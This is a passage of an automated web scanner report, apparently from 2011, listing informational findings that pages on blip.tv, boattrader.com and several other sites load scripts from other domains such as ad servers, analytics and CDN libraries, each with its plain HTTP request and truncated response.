<script type="text/javascript" src="http://a.blip.tv/scripts/url.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariPlayer.js?v=myapologiestothejeff"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/uuid.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Dashboard.js?v=curlymcburton"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.736. http://www.blip.tv/play/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/play/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
http://edge.quantserve.com/quant.js

Request

GET /play/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Content-Type: text/html; charset=utf-8
Content-Length: 10373
Date: Tue, 25 Jan 2011 13:13:15 GMT
X-Varnish: 1794568282
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...



<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.737. http://www.blip.tv/posts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/posts

Issue detail

The response dynamically includes the following scripts from other domains:

http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90
http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600
http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay
http://edge.quantserve.com/quant.js

Request

GET /posts HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:28 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 51904
Date: Tue, 25 Jan 2011 13:13:28 GMT
X-Varnish: 496207028
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...



<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...

<script type="text/javascript" src="http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay"></script>
...[SNIP]...


<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600" language="javascript"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<center>
<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90" language="javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.738. http://www.blip.tv/posts/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/posts/

Issue detail

The response dynamically includes the following scripts from other domains:

http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90
http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600
http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay
http://edge.quantserve.com/quant.js

Request

GET /posts/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:18 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:18 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 52159
Date: Tue, 25 Jan 2011 13:13:18 GMT
X-Varnish: 496206167
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...



<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...

<script type="text/javascript" src="http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay"></script>
...[SNIP]...


<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600" language="javascript"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<center>
<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90" language="javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.739. http://www.blip.tv/prefs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/prefs/

Issue detail

The response dynamically includes the following scripts from other domains:

http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Error.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Error/Help.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Form.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Form/SettingsForm.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Form/SettingsForm/LoginForm.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Utils.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
http://edge.quantserve.com/quant.js

Request

GET /prefs/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=prefs; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:19 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14134
Date: Tue, 25 Jan 2011 13:13:19 GMT
X-Varnish: 2104818017
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...



<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
</style>

       <script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Utils.js?v=thingsrealpeoplesay"></script>
       <script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Form.js?v=thingsrealpeoplesay"></script>
       <script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Form/SettingsForm.js?v=thingsrealpeoplesay"></script>
       <script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Form/SettingsForm/LoginForm.js?v=thingsrealpeoplesay"></script>
       <script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Error.js?v=thingsrealpeoplesay"></script>
       <script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Error/Help.js?v=thingsrealpeoplesay"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.740. http://www.blip.tv/users previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/users

Issue detail

The response dynamically includes the following scripts from other domains:

http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90
http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600
http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay
http://edge.quantserve.com/quant.js

Request

GET /users HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:30 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:13:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 35755
Date: Tue, 25 Jan 2011 13:13:31 GMT
X-Varnish: 496207031
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...



<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...

<script type="text/javascript" src="http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay"></script>
...[SNIP]...


<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600" language="javascript"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<center>
<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90" language="javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.741. http://www.blip.tv/users/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.blip.tv
Path:	/users/

Issue detail

The response dynamically includes the following scripts from other domains:

http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90
http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600
http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay
http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay
http://edge.quantserve.com/quant.js

Request

GET /users/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:20:43 GMT
Set-Cookie: tab_state=blog; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:20:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 35755
Date: Tue, 25 Jan 2011 13:13:27 GMT
X-Varnish: 496206815
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

...[SNIP]...



<script type="text/javascript" src="http://a.blip.tv/scripts/json.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/pokkariJavascript.js?v=thingsrealpeoplesay"></script>

<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Object.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Delegate.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Control.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/Navigation.js?v=thingsrealpeoplesay"></script>
<script type="text/javascript" src="http://a.blip.tv/scripts/BLIP/Controls/FastUserMenu.js?v=thingsrealpeoplesay"></script>
...[SNIP]...

<script type="text/javascript" src="http://a.blip.tv/scripts/surveyWidget.js?v=thingsrealpeoplesay"></script>
...[SNIP]...


<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=skyscraper&w=160&h=600" language="javascript"></script>
...[SNIP]...
</noscript>

<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<center>
<script src="http://2822.v.fwmrm.net/ad/g/1?nw=10274&pvrn=Insert Random Number Here&csid=episodes&resp=ad;;ptgt=s&envp=g_js&slid=banner&w=728&h=90" language="javascript"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

21.742. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.bmwusa.com
Path:	/Secured/Content/Forms/Login.aspx

Issue detail

The response dynamically includes the following script from another domain:

https://com-bmwusa.netmng.com/

Request

Response

21.743. http://www.boats.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boats.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=093ab8ab-5461-e2dd5ff4-0fc0-40bb-a961-20106dca9987&lID=1&loc=4q-web1

Request

GET / HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

21.744. http://www.boattrader.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boattrader.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.boattrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:45:55 GMT
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:45:55 GMT
Connection: close
Content-Type: text/html
Set-Cookie: TSef43b4=2ffdd2520e75126ede44933ba8ef34039e5be810eff911074d3e1425759e864aee104e3b; Path=/
Content-Length: 126523

<!DOCTYPE html>
<html>
<head>
   <title>Boats for Sale - Buy Boats, Sell Boats, Boating Resources, Boat Dealers, Parts and Accessories - Boat Trader </title>
   <meta http-equiv
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.745. http://www.boattrader.com/research/resources/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boattrader.com
Path:	/research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.boattrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:40 GMT
X-Powered-By: PHP/5.2.13
Last-Modified: Mon, 24 Jan 2011 23:57:40 GMT
If-Modified-Since: Mon, 24 Jan 2011 23:57:40 GMT
Connection: close
Content-Type: text/html
Content-Length: 25335


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Boat Resources: Boat Loans, Insurance, Transport, And More - BoatTrader.com</title>
   <m
...[SNIP]...
</script> -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.746. http://www.boattrader.com/sell/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boattrader.com
Path:	/sell/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.boattrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:46:17 GMT
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 23441


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell Your New Or Used Boat - Boattrader.com</title>
   <meta name="description" content
...[SNIP]...
</script> -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.747. http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.boutell.com
Path:	/lsm/lsmbyid.cgi/002057/x22

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /lsm/lsmbyid.cgi/002057/x22 HTTP/1.1
Host: www.boutell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:31 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7843

<title>Linux Software Map: Error</title>
<link href="/main.css" rel="stylesheet" type="text/css">

<body>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.pus
...[SNIP]...
</script>
       <script type="text/javascript"
        src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
       </script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.748. http://www.bymnews.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bymnews.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.bymnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:15:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
